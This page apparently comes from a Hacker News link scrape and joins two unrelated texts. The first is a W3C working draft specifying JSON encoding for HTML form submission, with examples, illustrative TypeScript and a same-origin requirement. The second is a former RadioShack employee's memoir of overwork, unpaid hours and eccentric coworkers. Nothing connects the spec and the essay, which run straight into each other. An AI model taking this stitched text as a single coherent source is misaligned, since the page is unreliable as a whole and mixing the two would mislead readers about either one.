Hacker News from Y Combinator

Links for the intellectually curious, ranked by readers.

W3C HTML JSON form submission

Abstract

This specification defines a new form encoding algorithm that enables the transmission of form data as JSON. Instead of capturing form data as essentially an array of key-value pairs, which is the bread and butter of existing form encodings, it relies on a simple name attribute syntax that makes it possible to capture rich data structures as JSON directly.

Status of This Document

This section describes the status of this document at the time of its publication. Other documents may supersede this document. A list of current W3C publications and the latest revision of this technical report can be found in the W3C technical reports index at http://www.w3.org/TR/.

This specification is an extension specification to HTML.

This document was published by the HTML Working Group as a First Public Working Draft. This document is intended to become a W3C Recommendation. If you wish to make comments regarding this document, please send them to public-html@w3.org (subscribe, archives). All comments are welcome.

Publication as a First Public Working Draft does not imply endorsement by the W3C Membership. This is a draft document and may be updated, replaced or obsoleted by other documents at any time. It is inappropriate to cite this document as other than work in progress.

This document was produced by a group operating under the 5 February 2004 W3C Patent Policy. W3C maintains a public list of any patent disclosures made in connection with the deliverables of the group; that page also includes instructions for disclosing a patent. An individual who has actual knowledge of a patent which the individual believes contains Essential Claim(s) must disclose the information in accordance with section 6 of the W3C Patent Policy.

1. Introduction

This section is non-normative.

JSON is commonly used as an exchange format between Web clients and backend services. Enabling HTML forms to submit JSON directly simplifies implementation, as it enables backend services to operate by accepting a single input format that is, what's more, able to encode richer structure than other form encodings (where structure has traditionally had to be emulated).

User agents that implement this specification will transmit JSON data from their forms whenever the form's enctype attribute is set to application/json. During the transition period, user agents that do not support this encoding will fall back to using application/x-www-form-urlencoded. This can be detected on the server side, and the conversion algorithm described in this specification can be used to convert such data to JSON.
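
For illustration only (not part of this specification), a server might detect the fallback roughly as follows. This is a minimal TypeScript sketch; the handleFormBody name is ours, and the urlencoded branch only collects the raw entries, which can then be fed to the encoding algorithm of section 4 to recover the equivalent JSON.

// Sketch only: dispatch on the Content-Type the user agent actually sent.
function handleFormBody(contentType: string, body: string): unknown {
  if (contentType.startsWith("application/json")) {
    // Supporting user agent: the body is already the JSON described below.
    return JSON.parse(body);
  }
  if (contentType.startsWith("application/x-www-form-urlencoded")) {
    // Legacy fallback: collect the raw name/value entries; applying the
    // section 4 algorithm to them reconstructs the intended JSON.
    return Array.from(new URLSearchParams(body).entries());
  }
  throw new Error("unsupported form encoding: " + contentType);
}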

The path format used in input names is straightforward. To begin with, when no structuring information is present, the information will simply be captured as keys in a JSON object:

Example 1: Basic Keys

<form enctype='application/json'>
  <input name='name' value='Bender'>
  <select name='hind'>
    <option selected>Bitable</option>
    <option>Kickable</option>
  </select>
  <input type='checkbox' name='shiny' checked>
</form>

// produces
{
  "name":   "Bender"
, "hind":   "Bitable"
, "shiny":  true
}

If a path is repeated, its value is captured as an array:

Example 2: Multiple Values

<form enctype='application/json'>
  <input type='number' name='bottle-on-wall' value='1'>
  <input type='number' name='bottle-on-wall' value='2'>
  <input type='number' name='bottle-on-wall' value='3'>
</form>

// produces
{
  "bottle-on-wall":   [1, 2, 3]
}

Deeper structures can be produced using sub-keys in the path, using either string keys for objects or integer keys for arrays:

Example 3: Deeper Structure

<form enctype='application/json'>
  <input name='pet[species]' value='Dahut'>
  <input name='pet[name]' value='Hypatia'>
  <input name='kids[1]' value='Thelma'>
  <input name='kids[0]' value='Ashley'>
</form>

// produces
{
  "pet":  {
    "species":  "Dahut"
  , "name":     "Hypatia"
  }
, "kids": ["Ashley", "Thelma"]
}

As you can see above, the keys for array values can be in any order. If the array is somehow sparse, then null values are inserted:

Example 4: Sparse Arrays

<form enctype='application/json'>
  <input name='heartbeat[0]' value='thunk'>
  <input name='heartbeat[2]' value='thunk'>
</form>

// produces
{
  "heartbeat":  ["thunk", null, "thunk"]
}

Paths can cause structures to nest to arbitrary depths:

Example 5: Even Deeper

<form enctype='application/json'>
  <input name='pet[0][species]' value='Dahut'>
  <input name='pet[0][name]' value='Hypatia'>
  <input name='pet[1][species]' value='Felis Stultus'>
  <input name='pet[1][name]' value='Billie'>
</form>

// produces
{
  "pet":  [
    {
      "species":  "Dahut"
    , "name":     "Hypatia"
    }
  , {
      "species":  "Felis Stultus"
    , "name":     "Billie"
    }
  ]
}

Really, any depth you might need.

Example 6: Such Deep

<form enctype='application/json'>
  <input name='wow[such][deep][3][much][power][!]' value='Amaze'>
</form>

// produces
{
  "wow":  {
    "such": {
      "deep": [
        null
      , null
      , null
      , {
          "much": {
            "power": {
              "!":  "Amaze"
            }
          }
        }
      ]
    }
  }
}

The algorithm does not lose data in that every piece of information ends up being submitted. But given the path syntax, it is possible to introduce clashes such that one may attempt to set an object, an array, and a scalar value on the same key.

As seen in a previous example, trying to set multiple scalars on the same key will convert the value into an array. Trying to set a scalar value at a path that also contains an object will cause the scalar to be set on that object with the empty string key. Trying to set an array value at a path that also contains an object will cause the non-null values of that array to be set on the object using their array indices as keys. This is exemplified below:

Example 7: Merge Behaviour

<form enctype='application/json'>
  <input name='mix' value='scalar'>
  <input name='mix[0]' value='array 1'>
  <input name='mix[2]' value='array 2'>
  <input name='mix[key]' value='key key'>
  <input name='mix[car]' value='car key'>
</form>

// produces
{
  "mix":  {
    "":     "scalar"
  , "0":    "array 1"
  , "2":    "array 2"
  , "key":  "key key"
  , "car":  "car key"
  }
}

This may seem somewhat convoluted, but it should be considered a resilience mechanism meant to ensure that data is not lost, rather than the normal usage of the JSON encoding.

As we have seen above, multiple values with the same key are upgraded to an array, and it is also possible to use array offsets directly. However, when generating a form from existing data, one may not know whether there will be one or more instances of a given key (so that, without indices, one would get back at times a scalar and at times an array), and it can be cumbersome to generate array indices properly (especially if the field may be modified on the client side, which would mean maintaining the indices there as well). In order to indicate that a given path must contain an array irrespective of the number of its items, and without resorting to indices, one may use the append notation (only as the final step in a path):

Example 8: Append

<form enctype='application/json'>
  <input name='highlander[]' value='one'>
</form>

// produces
{
  "highlander":   ["one"]
}

The JSON encoding also supports file uploads. The values of files are themselves structured as objects and contain a type field indicating the MIME type, a name field containing the file name, and a body field with the file's content as base64.

Example 9: Files

<form enctype='application/json'>
  <input type='file' name='file' multiple>
</form>

// assuming the user has selected two text files, produces:
{
  "file": [
    {
      "type": "text/plain",
      "name": "dahut.txt",
      "body": "REFBQUFBQUFIVVVVVVVVVVVVVCEhIQo="
    },
    {
      "type": "text/plain",
      "name": "litany.txt",
      "body": "SSBtdXN0IG5vdCBmZWFyLlxuRmVhciBpcyB0aGUgbWluZC1raWxsZXIuCg=="
    }
  ]
}
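
For illustration (not part of this specification), a receiver could decode one such file object back to bytes as follows. The sketch assumes a Node-style Buffer is available; the JsonFile type and decodeJsonFile name are ours.

// Sketch only: recover the content of one uploaded file object.
type JsonFile = { type: string; name: string; body: string };

function decodeJsonFile(file: JsonFile): Uint8Array {
  // body carries the file content as base64, per the paragraph above
  return Uint8Array.from(Buffer.from(file.body, "base64"));
}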

Still in the spirit of not losing information, whenever a path makes use of an invalid syntax, it is simply used whole as if it were just a key with no structure:

Example 10: Bad input

<form enctype='application/json'>
  <input name='error[good]' value='BOOM!'>
  <input name='error[bad' value='BOOM BOOM!'>
</form>

// produces
{
  "error": {
    "good":   "BOOM!"
  }
, "error[bad": "BOOM BOOM!"
}

2. Conformance

As well as sections marked as non-normative, all authoring guidelines, diagrams, examples, and notes in this specification are non-normative. Everything else in this specification is normative.

The key words MUST, MUST NOT, REQUIRED, SHOULD, SHOULD NOT, RECOMMENDED, MAY, and OPTIONAL in this specification are to be interpreted as described in [RFC2119].

3. Terminology

The following terms are defined in the HTML specification. [html51]

The following terms are defined in ECMAScript. [ECMA-262]

4. The application/json encoding algorithm

For the purposes of the algorithms below, an Object corresponds to the in-memory representation for a JSONObject and an Array corresponds to the in-memory representation for a JSONArray.

The following algorithm encodes form data as application/json. It operates on the form data set obtained from constructing the form data set.

  1. Let resulting object be a new Object.
  2. For each entry in the form data set, perform these substeps:
    1. If the entry's type is file, set the is file flag.
    2. Let steps be the result of running the steps to parse a JSON encoding path on the entry's name.
    3. Let context be set to the value of resulting object.
    4. For each step in the list of steps, run the following subsubsteps:
      1. Let the current value be the value obtained by getting the step's key from the current context.
      2. Run the steps to set a JSON encoding value with the current context, the step, the current value, the entry's value, and the is file flag.
      3. Update context to be the value returned by the steps to set a JSON encoding value run above.
  3. Let result be the value returned from calling the stringify operation with resulting object as its first parameter and the two remaining parameters left undefined.
  4. Encode result as UTF-8 and return the resulting byte stream.

Note

The algorithm above deliberately ignores any charset information (e.g. from accept-charset) and always encodes the resulting JSON as UTF-8. This is an intentionally sane behaviour.

The steps to parse a JSON encoding path are as follows:

  1. Let path be the path we are to parse.
  2. Let original be a copy of path.
  3. Let steps be an empty list of steps.
  4. Let first key be the result of collecting a sequence of characters that are not U+005B LEFT SQUARE BRACKET ("[") from the path.
  5. If first key is empty, jump to the step labelled failure below.
  6. Otherwise remove the collected characters from path and push a step onto steps with its type set to "object", its key set to the collected characters, and its last flag unset.
  7. If the path is empty, set the last flag on the last step in steps and return steps.
  8. Loop: While path is not an empty string, run these substeps:
    1. If the first two characters in path are U+005B LEFT SQUARE BRACKET ("[") followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Set the append flag on the last step in steps.
      2. Remove those two characters from path.
      3. If there are characters left in path, jump to the step labelled failure below.
      4. Otherwise jump to the step labelled loop above.
    2. If the first character in path is U+005B LEFT SQUARE BRACKET ("["), followed by one or more ASCII digits, followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Remove the first character from path.
      2. Collect a sequence of characters being ASCII digits, remove them from path, and let numeric key be the result of interpreting them as a base-ten integer.
      3. Remove the following character from path.
      4. Push a step onto steps with its type set to "array", its key set to the numeric key, and its last flag unset.
      5. Jump to the step labelled loop above.
    3. If the first character in path is U+005B LEFT SQUARE BRACKET ("["), followed by one or more characters that are not U+005D RIGHT SQUARE BRACKET, followed by U+005D RIGHT SQUARE BRACKET ("]"), run these subsubsteps:
      1. Remove the first character from path.
      2. Collect a sequence of characters that are not U+005D RIGHT SQUARE BRACKET, remove them from path, and let object key be the result.
      3. Remove the following character from path.
      4. Push a step onto steps with its type set to "object", its key set to the object key, and its last flag unset.
      5. Jump to the step labelled loop above.
    4. If this point in the loop is reached, jump to the step labelled failure below.
  9. For each step in steps, run the following substeps:
    1. If the step is the last step, set its last flag.
    2. Otherwise, set its next type to the type of the next step in steps.
  10. Return steps.
  11. Failure: return a list of steps containing a single step with its type set to "object", its key set to original, and its last flag set.
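
As a non-normative illustration, the parsing steps above can be transcribed into TypeScript roughly as follows; the Step type and the parsePath name are ours, not the specification's.

// Sketch only: mirrors the numbered parsing steps above.
type Step = {
  type: "object" | "array";
  key: string | number;
  last: boolean;
  append?: boolean;
  nextType?: "object" | "array";
};

function parsePath(original: string): Step[] {
  // Step 11: on any failure, the whole path becomes a single object key.
  const failure: Step[] = [{ type: "object", key: original, last: true }];
  let path = original;

  // Steps 4-6: collect the first key, up to the first "[".
  const firstBracket = path.indexOf("[");
  const firstKey = firstBracket === -1 ? path : path.slice(0, firstBracket);
  if (firstKey === "") return failure;
  const steps: Step[] = [{ type: "object", key: firstKey, last: false }];
  path = firstBracket === -1 ? "" : path.slice(firstBracket);

  // Step 8: consume bracketed segments until the path is exhausted.
  while (path !== "") {
    if (path.startsWith("[]")) {
      steps[steps.length - 1].append = true;
      path = path.slice(2);
      if (path !== "") return failure; // "[]" is only valid at the end
      continue;
    }
    const m = /^\[([^\]]+)\]/.exec(path);
    if (!m) return failure;
    const key = m[1];
    if (/^[0-9]+$/.test(key)) {
      steps.push({ type: "array", key: parseInt(key, 10), last: false });
    } else {
      steps.push({ type: "object", key, last: false });
    }
    path = path.slice(m[0].length);
  }

  // Step 9: mark the last step and record each step's successor type.
  for (let i = 0; i < steps.length; i++) {
    if (i === steps.length - 1) steps[i].last = true;
    else steps[i].nextType = steps[i + 1].type;
  }
  return steps;
}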

The steps to set a JSON encoding value are as follows:

  1. Let context be the context this algorithm is called with.
  2. Let step be the step of the path this algorithm is called with.
  3. Let current value be the current value this algorithm is called with.
  4. Let entry value be the entry value this algorithm is called with.
  5. Let is file be the is file flag this algorithm is called with.
  6. If is file is set then replace entry value with an Object having its "name" property set to the file's name, its "type" property set to the file's type, and its "body" property set to the Base64 encoding of the file's body. [RFC2045]
  7. If step has its last flag set, run the following substeps:
    1. If current value is undefined, run the following subsubsteps:
      1. If step's append flag is set, set the context's property named by the step's key to a new Array containing entry value as its only member.
      2. Otherwise, set the context's property named by the step's key to entry value.
    2. Else if current value is an Array, then get the context's property named by the step's key and push entry value onto it.
    3. Else if current value is an Object and the is file flag is not set, then run the steps to set a JSON encoding value with context set to the current value; a step with its type set to "object", its key set to the empty string, and its last flag set; current value set to the current value's property named by the empty string; the entry value; and the is file flag. Return the result.
    4. Otherwise, set the context's property named by the step's key to an Array containing current value and entry value, in this order.
    5. Return context.
  8. Otherwise, run the following substeps:
    1. If current value is undefined, run the following subsubsteps:
      1. If step's next type is "array", set the context's property named by the step's key to a new empty Array and return it.
      2. Otherwise, set the context's property named by the step's key to a new empty Object and return it.
    2. Else if current value is an Object, then return the value of the context's property named by the step's key.
    3. Else if current value is an Array, then run the following subsubsteps:
      1. If step's next type is "array", return current value.
      2. Otherwise, run the following subsubsubsteps:
        1. Let object be a new empty Object.
        2. For each item and zero-based index i in current value, if item is not undefined then set a property of object named i to item.
        3. Set the context's property named by the step's key to object.
        4. Return object.
    4. Otherwise, run the following subsubsteps:
      1. Let object be a new Object with a property named by the empty string set to current value.
      2. Set the context's property named by the step's key to object.
      3. Return object.
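
Again as a non-normative illustration, the value-setting steps and the top-level algorithm of section 4 can be sketched in TypeScript, building on the parsePath sketch above. The setValue and encodeFormData names are ours, and the numbered comments refer to the steps above.

// Sketch only: setValue mirrors the numbered steps; encodeFormData is the
// section 4 driver. File entries are assumed to already carry their
// {name, type, body} object (step 6 above is not repeated here).
function setValue(
  context: any,
  step: Step,
  currentValue: unknown,
  entryValue: unknown,
  isFile: boolean
): any {
  if (step.last) {
    if (currentValue === undefined) {
      // 7.1: fresh key; honour the append ("[]") flag
      context[step.key] = step.append ? [entryValue] : entryValue;
    } else if (Array.isArray(currentValue)) {
      // 7.2: the key already holds an array; push
      currentValue.push(entryValue);
    } else if (typeof currentValue === "object" && currentValue !== null && !isFile) {
      // 7.3: scalar clashing with an object lands on the empty-string key
      const emptyStep: Step = { type: "object", key: "", last: true };
      return setValue(currentValue, emptyStep, (currentValue as any)[""], entryValue, isFile);
    } else {
      // 7.4: a second scalar on the same key upgrades it to an array
      context[step.key] = [currentValue, entryValue];
    }
    return context;
  }
  if (currentValue === undefined) {
    // 8.1: create a container shaped by the next step
    context[step.key] = step.nextType === "array" ? [] : {};
    return context[step.key];
  }
  if (Array.isArray(currentValue)) {
    if (step.nextType === "array") return currentValue; // 8.3.1
    // 8.3.2: array clashing with object keys folds indices into an object
    const obj: any = {};
    currentValue.forEach((item, i) => {
      if (item !== undefined) obj[String(i)] = item;
    });
    context[step.key] = obj;
    return obj;
  }
  if (typeof currentValue === "object" && currentValue !== null) {
    return currentValue; // 8.2: descend into the existing object
  }
  // 8.4: a scalar is in the way; wrap it under the empty-string key
  const wrapper: any = { "": currentValue };
  context[step.key] = wrapper;
  return wrapper;
}

function encodeFormData(entries: { name: string; value: unknown; isFile?: boolean }[]): string {
  const result: any = {};
  for (const entry of entries) {
    let context: any = result;
    for (const step of parsePath(entry.name)) {
      const currentValue = context[step.key];
      context = setValue(context, step, currentValue, entry.value, !!entry.isFile);
    }
  }
  return JSON.stringify(result); // the spec then UTF-8-encodes this string
}

// e.g. encodeFormData([{ name: "kids[1]", value: "Thelma" },
//                      { name: "kids[0]", value: "Ashley" }])
//   -> '{"kids":["Ashley","Thelma"]}'
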
5. Form Submission

Given that there exist deployed services using JSON and ambient authentication, and given that form requests are not protected by the same-origin policy by default, if this encoding were left wide open then a number of attacks would become possible. Because of this, when using the application/json form encoding the same-origin policy is enforced.

When the form submission algorithm is invoked in order to submit as entity body with enctype set to application/json and entity body set to the result of applying the application/json encoding algorithm, causing the browsing context to navigate, the user agent MUST invoke the fetch algorithm with the force same-origin flag.

6. Acknowledgements

Thanks to Philippe Le Hégaret for serving as a sounding board for the first version of the encoding algorithm.

A. References

A.1 Normative references
[ECMA-262]
ECMAScript Language Specification, Edition 5.1. June 2011. URL: http://www.ecma-international.org/publications/standards/Ecma-262.htm
[RFC2045]
N. Freed and N. Borenstein. Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies. November 1996. URL: http://www.ietf.org/rfc/rfc2045.txt
[RFC2119]
S. Bradner. Key words for use in RFCs to Indicate Requirement Levels. March 1997. Internet RFC 2119. URL: http://www.ietf.org/rfc/rfc2119.txt
[html51]
Robin Berjon; Steve Faulkner; Travis Leithead; Erika Doyle Navara; Edward O'Connor; Silvia Pfeiffer. HTML 5.1. 4 February 2014. W3C Working Draft. URL: http://www.w3.org/TR/html51/

A Eulogy for RadioShack

This may very well be RadioShack's final holiday season. Jon, a former employee, looks back on a strange, craven, five thousand-fingered strip-mall monster from a forgotten age.

RadioShack won't be the only store to open on Thanksgiving Day, but it might be the only one of its particular makeup to do so. This isn't Walmart or a call center, in which volunteers who want overtime pay can be chosen first. Most RadioShack stores have just a handful of employees, most or all of whom will work Thanksgiving whether they want to or not. Retail employees have very, very little in the way of perks, of things that are understood to be sacred. Having Thanksgiving Day to themselves was one of them.

After some pushback from its employees, RadioShack gave in just a little: after originally planning to open from 8 a.m. to midnight on Thanksgiving, its stores will now close for a few hours in the middle of the day so that its folks can have a little bit of family time.

RadioShack is a company with a massive real-estate footprint, peddling a business model that is completely unviable in 2014. It's very likely to go extinct soon, and I doubt there's anything its operators can do about it. In scenarios like this one, there aren't happy stories or easy answers, and if this were any other company, I'd concede that, perhaps, opening on Thanksgiving is a regrettable but necessary stab at saving the company, employees and all.

But as this company has spent the last decade-plus trying to save itself, the happiness of the employees has always been the first to go overboard. Its store managers are worked so hard that they become unhappy, half-awake shadows of themselves. Labor laws have been brazenly ignored. Untold hours of labor haven't been paid for (when I quit, on good terms and with two weeks' notice, they withheld my final paychecks for months and wouldn't tell me why). Lawyers have been sent to shut down websites that have bad things to say about RadioShack. Employees who make a few dimes over minimum wage are pressured, shamed, and yelled at as though they're brokering million-dollar deals.

RadioShack is a rotten place to work, generally not a very good place to shop, and an untenable business to run. Everyone involved loses.

These are stories from my three and a half years as a RadioShack employee.

I.

I really hope Black Fridays aren't like they were a decade ago, but I doubt much has changed.

During the 2004 holiday season, I worked in a Radio Shack situated in a dying mall with virtually no foot traffic. It was hard enough making much in the way of commissions when the sales were split between our usual staff of three or four employees. Radio Shack is a corporation dedicated to the prolonged destruction of the individual, so it tripled our staff right before Black Friday, ensuring that no one would make any money.

And during this season, Radio Shack also decided to abandon newspaper inserts, which had always been the lifeblood of its advertising. There was no explanation given for this, but it ensured that we would make a fraction of zero money.

4:30 a.m. We show up an hour and a half before the store opens, as demanded by the district office.  We stand around and do nothing.
6:00 a.m. We all line up in expectation of hordes of customers. Six on one side of the store, six on the other side, pallbearers of an invisible casket. The manager opens the doors. No one is waiting on the other end.
7:00 a.m. Nobody has walked into the store. Nobody has been seen even walking past the store. This infuriates the manager, who at this juncture elects to fire one employee, right there on the spot, because her sweater is a shade of red that is inconsistent with the dress code.
8:00 a.m. Someone almost walks in. She kind of turns toward the store, sees 11 of us just standing and staring at her, and turns a 180. Don't blame you, ma'am.
9:00 a.m. First customer! Someone just walked in and bought a cordless phone battery. One of us would have made approximately 23 cents on the sale (18 cents after taxes), except you don't start making any sales commission until you surpass a monthly sales figure that is usually unreachable and arbitrarily set. (I worked at Radio Shack for 43 months, and barely hit this mark once.)
12:00 p.m. We've sold maybe $90 worth of stuff. Two more employees walk out and don't come back.
2:00 p.m. A couple comes in to return a pair of cell phones I sold them a couple weeks back. I received about $40 for the sale on my last paycheck, and now they will take $40 out of my next paycheck. Voiding a cell phone contract is a process that takes an hour or so of waiting on the phone and talking to three or four different gatekeepers. This time, it's even longer, because someone errantly slapped them with a $200 cancellation fee. My manager gets wind of this and starts screaming at me: "JON, WHAT DID YOU DO? WHAT THE FUCK DID YOU DO?" She then tries to initiate a shouting match with my customers, who don't bite.
3:00 p.m. Two more employees quit, one because the manager has refused to give her a lunch break over a 10.5-hour shift.
9:00 p.m. Mercifully, and with sales numbers that are beyond abysmal, the district office tells us to close the store and not to remain open until midnight, as planned. Someone else came in to return a phone, so my sales are now about $60 in the hole. I make $5.45 an hour, and have worked a 16.5-hour shift, so that's about $90. Minus the $60 I've lost, that's $30. So today, I have made about $1.80 per hour, for a shift of nearly 17 hours. Before taxes.
9:45 p.m. Ha ha ha ha I am still at the store, counting the money and helping clean up and such, but not getting paid for it. This is Radio Shack's thing: if you're working while the store's closed, they might decide to pay you and they might not. I worked countless hours they never paid me for; this is one. We finally close up. On the way to the parking lot, I ask my manager whether I can take Christmas Eve off; this would allow me barely enough time to make the seven-hour drive home to Kentucky to see my family, then head back. She doesn't say no. She yells no, and tells me I'm not special.

II.

That story paints that store manager as the worst woman on Earth, which I swear is not true. She was at heart a good person, and had major stress/anxiety issues, and "RadioShack manager" is just about the worst position for a person with those issues (or any person). Being a manager made her miserable and unhealthy, as it tends to do to people.

I had well over a dozen different managers across my RadioShack career. One of them, who was also a friend of mine, dealt with it by getting loaded. I'd often give him rides to and from work, and on the way home, he'd ask me to swing by the gas station so he could pick up a 24-pack of Bud Light. Since I wasn't 21, this was a pretty sweet deal. I'd drink one or two beers with him in the parking lot, and then he'd go inside and kill the rest in a single night. I should have maybe said something, or done something, but I was 20 and there were things that didn't occur to me then.

III.

Another manager of mine staggered through life in a state of perpetual exhaustion. Our entire store had exactly three employees; my co-worker and I worked 40 or 50 hours per week, and he worked a minimum of 70 if he was lucky. We often had just one employee at the store at any given time, and sometimes, when there weren't any customers in the store, he'd take a nap in the back room. More than once, while he was back there, someone would walk in and shoplift hundreds of dollars' worth of stuff off the shelves and walk out in plain sight.

He just didn't give a shit. Sometimes, due to various obligations, he was working 80, 90 hours a week. He was pretty low on his hierarchy of needs: he didn't care about selling things, or making commission, or running a good store, or climbing any kind of career ladder. He was just trying to survive. He was trying to keep being an alive person for another hour. He made $23,000 a year.

IV.

He and I sometimes saw our work week increase by five to a dozen hours because of inventories. Most folks who have worked in retail are probably familiar with this. Once every couple months, we'd have to stay after hours and count inventory. The store computer would print out a novel of every single item we were supposed to have in stock, from TVs to transistors to batteries, and then we'd have to root through the entire store and make sure we had all of it.

This could mean staying until midnight on a good inventory, or staying until five in the morning, depending on how obsessive my manager happened to be. Radio Shack could very easily have scheduled these regularly and in advance, as a courtesy to its employees, but Radio Shack is a craven and unfeeling entity that displayed what I can only describe as open contempt for those it employed. The higher-ups preferred to spring them on us with maybe a day's notice.

That is a major violation of labor laws, but they didn't care. Sometimes they'd call an hour before the store closed to let us know we were staying there until two in the morning. We could comply or be fired.

V.

I recently bought a new phone from a Sprint employee who used to manage a Radio Shack. He told me about a time he ran his store for an entire day, 9 a.m. to 9 p.m., all by himself without a lunch break. After closing, he was told to immediately head to another store and help with their inventory. He stayed up all night doing so, then headed right back to his store for another 12-hour shift. Thirty-six hours.

VI.

I am not letting up on Radio Shack, a machine that sometimes operates in a way that could be confused with malevolence, hammering away at good people until they are a heap of dust and a plastic name tag.

I am not letting up in part because, for a time at least, Radio Shack tried to silence employees who shared their stories online. The company was the target of a class-action suit alleging (correctly) that it failed to pay massive amounts of overtime. A forum frequented by employees, RadioShackSucks, was instrumental in rounding up those who opted in to the suit.

At this point in history, it's inconceivable that a company would shut down an Internet forum for "defaming" them. That's what Radio Shack tried to do, and kind of did. I am not worried about this today, because that isn't how it works and because Radio Shack is now too half-dead to do anything about it anyway, and thank God.

VII.

And when I say "thank God," I'm also thinking of the people working there today who will probably be jobless soon. My heart breaks for them, and I hope they -- like me, the guy at the Sprint store, and my friends from those days -- go on to find a place that isn't so damned miserable. Many are great, massively over-qualified people who RadioShack never deserved for a second.

Some were, uh, not. For a few months, I worked with this guy I'll call Craig. He was a guy in his fifties who had been making lots of money growing pot out in the country until the feds busted him and took it all, and he mostly preferred to stand around and crack jokes about TV shows I'd never seen. Every day, halfway through his shift, he'd happily announce that he was going to go "take [his] medicine," and then sit in his car and get extraordinarily stoned and become Stoned Craig.

Stoned Craig would turn the volume all the way up on the Casio keyboards and just bang away at the keys. He didn't play music, it was just a bunch of BLONK BLONK BLONK BLONK, but he was having the sort of good time you and I might not be able to understand.

VIII.

Stoned Craig was considerably more skilled with the talking picture frames we'd always have on display: you pushed a button on the picture frame, and it'd play a pre-recorded message. Craig loved recording them; there was a new message every day.

So that sets the table for this: a nice old lady is browsing around the store and comes across one of the picture frames. There's a stock image in the frame, a little girl in a tire swing with an ear-to-ear grin.

From across the store I see her, and I pray that today's affirmation is at least G-rated. She presses the button. The voice of Stoned Craig, which sounds just like Tom Waits, blares forth.

QUIT FINGERIN' THE GODDAMN MERCHANDISE AND MAKE A FUCKIN' PURCHASE!

The old lady busted out laughing, and I think she might have ended up buying the picture frame. If she did, that might have been the only sale Craig ever had a hand in making.

IX.

Once, I was activating a cell phone for a customer when Stoned Craig staggered over to me. Then he just stood there. After a minute, he said, "I'm hungry, Paw." If he was quoting something, I still have no idea what it was. He just kept repeating it.

Stoned Craig: I'm hungry, Paw.
Me: ... so this is a $39.99 plan, and if you sign a two-year deal, you'll also get 500 text messages--
Stoned Craig: I'm hungry, Paw.
Customer: Is he all right?
Me: Hey, Craig. You wanna maybe chill out in the back room for a minute?
Stoned Craig: [walking away] I'm hungry, Paw.

Hope that you're doing well, Craig, and that you found a dinner out there somewhere.

X.

There is a part of me that isn't comfortable talking this way about an employer that provided my income for three and a half years, but I, along with most people I worked with, put in far more than we got back.

A friend of mine worked at a RadioShack in a decrepit mall that has since been torn down. There was a restaurant upstairs, and in the middle of the night, its floor collapsed, along with its plumbing. He opened the store the next morning to find it covered in sewage and human waste; to hear him tell it, there were fifty pounds of it all over the place.

Any reasonable business, of course, would immediately pick up the phone and hire a hazmat team. Our district office ordered my friend to clean it up himself. When he refused, he almost lost his job.

XI.

RadioShack would claim to its new hires that its sales associates commonly made $20 per hour, which is inarguably complete bullshit; the majority of ground-level employees I knew averaged less than half that figure. As a result, the workforce was a revolving door of people who realized they'd been suckered, realized it wasn't going to get better, and quit. The long-term employees were often like me -- we would have moved on if we could have found anything better.

We all fantasized about quitting in dramatic fashion, dropping our name tag on our manager's desk, and stomping out. I never did, and came closest to it when my manager accused me of stealing a CD-ROM drive out of one of the desktop computers. There was an empty space in the tower where a CD-ROM drive would go, but there had never been one there.

My manager, who had spent Lord knows how long in an overworked, screamed-at, sleep-deprived haze, suddenly decided that there had, in fact, been a CD-ROM drive in that computer. Further, she decided that I, the only one who had stuck with her over the last year and the one who had been there for her so many times, was the one who stole it. When I denied this, I was screamed at, and she threatened to call the loss prevention department and/or the police.

In a huff, she picked up the phone to call another manager and prove the computers were supposed to have those drives. Nope. She called another: no. She finally relented when the third manager told her no. I told her I thought I deserved an apology. She flatly told me that, no, I would not get an apology, and that by the way, the store's schedule had changed and I wouldn't be able to take my planned vacation.

XII.

At that point in my career, I would have at least had an honest-to-god name tag to indignantly throw on the ground. I spent my first year wearing a blank tag with my name handwritten on a scrap of paper I taped to it. They just wouldn't order me one.

Once, during a store visit, my district manager scolded me for not wearing the name tag I didn't have, and insisted I wear a proper one, any one we had lying around. I had the option of being Chad or Elizabeth. I decided to be Elizabeth, and then he said that no, I could not be Elizabeth.

XIII.

The fun thing about those name tags: they were magnetic. For fun, we used to walk by each other and slap them off each other's shirts.

I did this to my assistant manager all the time. I'd found a spare "ASSISTANT MANAGER" name tag of his, which I'd altered with black electrical tape and hid in my pocket. I smacked his name tag off his chest, bent down to pick it up, and gave him the other one through sleight-of-hand. And that is how he ended up wearing a name tag for an entire day that read "ASS MAN."

XIV.

The majority of my RadioShack experience felt like guard duty. Depending on the store and the time of year, I could go four or five hours without seeing a single person walk in the door.

We kind of had to amuse ourselves. For some damn reason, the company had ordered a ludicrous number of remote-controlled PT Cruisers. We literally had a hundred of them in our little store alone. Nobody bought them, of course, because PT Cruisers are boring and stupid.

So a friend of mine would take a couple of them out to the middle of the mall and hold impromptu demolition derbies, just smashing them into each other until one of them stopped working. They would draw little crowds, and employees of nearby stores would stand in their doorways and watch. We even put money on them one time.

Look, y'all. RadioShack may have been a crummy company, but I'm not blameless here, either.

XV.

The same merchandise procurers who ordered all those PT Cruisers ordered all kinds of other unsellable crap, like remote-controlled Brum cars. It's okay that you don't know what Brum is. It's a British children's cartoon that nobody in America has ever heard of.

And yet, we were required to display a stack of 20 or so Brum cars right in the middle of an already-cramped store, because we were so desperate to get rid of them. People would walk around them and bump into them and say, "uh, what is Brum?" Zero of them were sold.

After months of this, a family I presume to be from England walked into the store one day. They saw the display and their eyes lit up in unison. And I swear to God: they made a circle around the Brum toys and held hands and started dancing around it, singing the Brum song. Either it's a two-minute-long song, or they sang it a bunch of times in a row.

It remains one of the most surreal moments of my entire life. They didn't buy one, either.

XVI.

RadioShack also tried to sell a thing called a CueCat, although by the time I started working there, they were trying without much success to give them away for free. A CueCat was an infrared scanner that read barcodes from magazine ads.

This was the idea: you, the consumer, were supposed to sit next to your computer and read a magazine. When you saw an ad you liked, you were supposed to scan it with the CueCat and hook it up to your computer, and it would direct your browser to the advertiser's web site.

This technology was developed by a man who legally changed his name to J. Hutton Pulitzer. Here is a long, barely-intelligible interview of him that you shouldn't read; half the time, I can't understand what the Hell he's talking about. RadioShack gave tens of millions of dollars to this dude because they thought consumers' idea of a good time was to sit there, do all the work, and advertise to themselves. If there is such a thing as dada investing, this was it.

This might have been the dumbest of many, many dumb ideas to come from RadioShack over the last 15 years. I think it's perfectly understandable, to be honest.

